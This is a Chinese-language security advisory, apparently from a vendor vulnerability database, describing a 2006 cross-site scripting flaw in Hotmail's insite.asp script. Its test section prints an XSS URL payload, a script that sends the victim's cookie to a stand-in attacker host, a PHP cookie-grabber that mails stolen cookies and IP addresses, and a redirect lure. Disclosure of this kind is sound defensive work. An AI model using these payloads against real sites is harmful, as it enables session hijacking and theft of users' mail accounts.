首页 -> 安全研究

安全研究

安全漏洞
Hotmail/MSN insite.asp跨站脚本执行漏洞

发布日期:2006-08-10
更新日期:2006-08-17

受影响系统:
Microsoft Hotmail
描述:
BUGTRAQ  ID: 19436
CVE(CAN) ID: CVE-2006-4113

Hotmail是微软提供的用于注册MSN的免费邮件系统。

Hotmail的CGI脚本实现上存在跨站脚本执行漏洞,远程攻击者可能利用此漏洞非授权访问其他用户的邮箱。

由于没有正确过滤用户输入,导致newsletter.msn.com的insite.asp脚本中存在跨站脚本漏洞。攻击者可以利用这个脚本在已认证MSN用户浏览器的环境中执行任意代码,导致窃取基于cookie的认证信息,在cookie过期之前(大约24个小时)临时访问受害用户的邮件帐号。

<*来源:Simo64 (simo64@morx[dot]org)
  
  链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=115522061605940&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><scriptsrc=http://attacker/redir.js>

这里redir.js代码可以为:

location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)

cookie-grabber.php可以为:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@email.org", $subject, $msg);

header ("location: http://attacker-site/some-pic.jpg");
?>

攻击者还可以使用html文件将受害用户重新定向至跨站脚本位置:

<meta http-equiv="refresh" content="0;
url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><scriptsrc=http://attacker/redir.js>">

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本 :

http://www.microsoft.com/technet/security/

浏览次数:3841
严重程度:7(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障